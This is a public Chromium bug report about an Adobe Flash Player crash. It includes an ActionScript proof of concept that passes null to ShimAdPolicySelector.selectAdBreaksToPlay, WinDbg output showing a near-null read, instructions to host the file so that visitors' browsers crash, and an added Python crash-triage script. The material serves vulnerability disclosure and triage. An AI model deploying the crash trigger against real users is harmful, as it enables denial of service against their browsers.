
Issue 619043


Issue metadata

Status: WontFix
Owner: ----
Closed: Jun 2016
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security


Security: Adobe Flash Player ShimAdPolicySelector Class Memory Corruption

Reported by laona...@gmail.com, Jun 10 2016

Issue description

VULNERABILITY DETAILS
A memory corruption vulnerability exists when the selectAdBreaksToPlay function call does not properly sanitize the input before processing, leading to a crash of Adobe Flash Player.

POC
package
{
   import flash.display.Sprite;
   import com.adobe.tvsdk.mediacore.timeline.advertising.policy.ShimAdPolicySelector;

   public class Main extends Sprite
   {

      public function Main()
      {
         super();
         // Construct the selector with a null second argument, then pass null
         // where an ad-break collection is expected; the crash is at the
         // resulting pointer dereference inside selectAdBreaksToPlay.
         var _loc1_:ShimAdPolicySelector = new ShimAdPolicySelector(0,null);
         _loc1_.selectAdBreaksToPlay(null);
      }
   }
}

Crash under windows + IE:
(8a8.1fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
0:007> r
eax=5342e253 ebx=000007d4 ecx=0681e660 edx=00000000 esi=069c0748 edi=00000000
eip=64f3b1ca esp=0240c20c ebp=0240c298 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
Flash32_21_0_0_242!DllUnregisterServer+0x13a8f7:
64f3b1ca 8b7f10          mov     edi,dword ptr [edi+10h] ds:0023:00000010=????????
0:007> u
Flash32_21_0_0_242!DllUnregisterServer+0x13a8f7:
64f3b1ca 8b7f10          mov     edi,dword ptr [edi+10h]
64f3b1cd 8b01            mov     eax,dword ptr [ecx]
64f3b1cf 8d5584          lea     edx,[ebp-7Ch]
64f3b1d2 52              push    edx
64f3b1d3 57              push    edi
64f3b1d4 ff5010          call    dword ptr [eax+10h]
64f3b1d7 83f807          cmp     eax,7
64f3b1da 7437            je      Flash32_21_0_0_242!DllUnregisterServer+0x13a940 (64f3b213)

Crash within Chrome is more or less the same.

VERSION
Chrome Version: 50.0.2661.102 (64-bit) + stable
Operating System: Mac, Adobe Flash Player - Version: 21.0.0.242

REPRODUCTION CASE
Put the attached PoC on an HTTP server and simply browse to it; it should give you a crash.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State: [see link above: stack trace, registers, exception record]
Client ID (if relevant): [see link above]

Attachment: selectAdBreaksToPlay.swf (645 bytes)
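The register dump in the report is enough for a first-pass triage: edi is zero and the faulting mov reads from [edi+10h], so the access lands at address 0x10, a near-null read rather than a controlled write. As an added example (not part of the report), this Python script parses such a WinDbg excerpt and classifies the fault; the excerpt is constructed from the lines above, and the 64 KiB near-null threshold is an assumed triage heuristic.

```python
import re

# Constructed excerpt modelled on the WinDbg `r` and disassembly lines in the report.
WINDBG_EXCERPT = """\
(8a8.1fc): Access violation - code c0000005 (first chance)
0:007> r
eax=5342e253 ebx=000007d4 ecx=0681e660 edx=00000000 esi=069c0748 edi=00000000
eip=64f3b1ca esp=0240c20c ebp=0240c298 iopl=0         nv up ei pl nz na pe nc
Flash32_21_0_0_242!DllUnregisterServer+0x13a8f7:
64f3b1ca 8b7f10          mov     edi,dword ptr [edi+10h] ds:0023:00000010=????????
"""

REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")
# Faulting line: "<eip> <bytes> <mnemonic> <operands> ds:<seg>:<target>=..."
FAULT_RE = re.compile(
    r"^(?P<addr>[0-9a-f]{8})\s+[0-9a-f]+\s+(?P<mnem>\w+)\s+(?P<ops>.*?)"
    r"\s+ds:[0-9a-f]{4}:(?P<target>[0-9a-f]{8})=", re.M)
NEAR_NULL_LIMIT = 0x10000  # assumed: accesses below 64 KiB treated as null-page derefs


def parse_registers(text):
    """Map register name -> integer value from the `r` output."""
    return {name: int(val, 16) for name, val in REG_RE.findall(text)}


def parse_fault(text):
    """Extract eip, mnemonic, operands and the faulting data address."""
    m = FAULT_RE.search(text)
    if not m:
        return None
    return {"eip": int(m["addr"], 16), "mnemonic": m["mnem"],
            "operands": m["ops"], "target": int(m["target"], 16)}


def triage(text):
    """Classify the crash as a null-deref read/write or a wild read/write."""
    regs, fault = parse_registers(text), parse_fault(text)
    if fault is None:
        return {"verdict": "unknown", "reason": "no faulting instruction found"}
    # Intel syntax: destination is the first operand; a memory destination means a write.
    is_write = fault["operands"].split(",")[0].strip().startswith("dword ptr")
    base = re.search(r"\[(e\w\w)", fault["operands"])  # e.g. [edi+10h] -> edi
    base_reg = base.group(1) if base else None
    kind = "write" if is_write else "read"
    if fault["target"] < NEAR_NULL_LIMIT and regs.get(base_reg) == 0:
        verdict, reason = f"null-deref {kind}", f"{base_reg}=0, access at {fault['target']:#x}"
    else:
        verdict, reason = f"wild {kind}", f"access at {fault['target']:#x}"
    return {"verdict": verdict, "reason": reason, "base_reg": base_reg,
            "eip": fault["eip"], "eip_matches": regs.get("eip") == fault["eip"]}
```

A near-null read like this one is normally a denial-of-service finding rather than a code-execution primitive, which is why the faulting address and the dereferenced register are the first things to check.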
Comment 1 by ClusterFuzz (Project Member), Jun 10 2016

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6366338595684352
Comment 2 by ClusterFuzz (Project Member), Jun 10 2016

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5394710072131584
Status: WontFix (was: Unconfirmed)
This doesn't repro.  Maybe it was fixed since m50?

Comment 4 by laona...@gmail.com, Jun 11 2016

Thanks for checking.
Do you mind sharing what the Flash Player version in m50 is? Where can I find it?

Thanks.
Comment 5 by sheriffbot@chromium.org (Project Member), Sep 17 2016

Labels: -Restrict-View-SecurityTeam
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 6 by sheriffbot@chromium.org (Project Member), Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 7 by sheriffbot@chromium.org (Project Member), Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic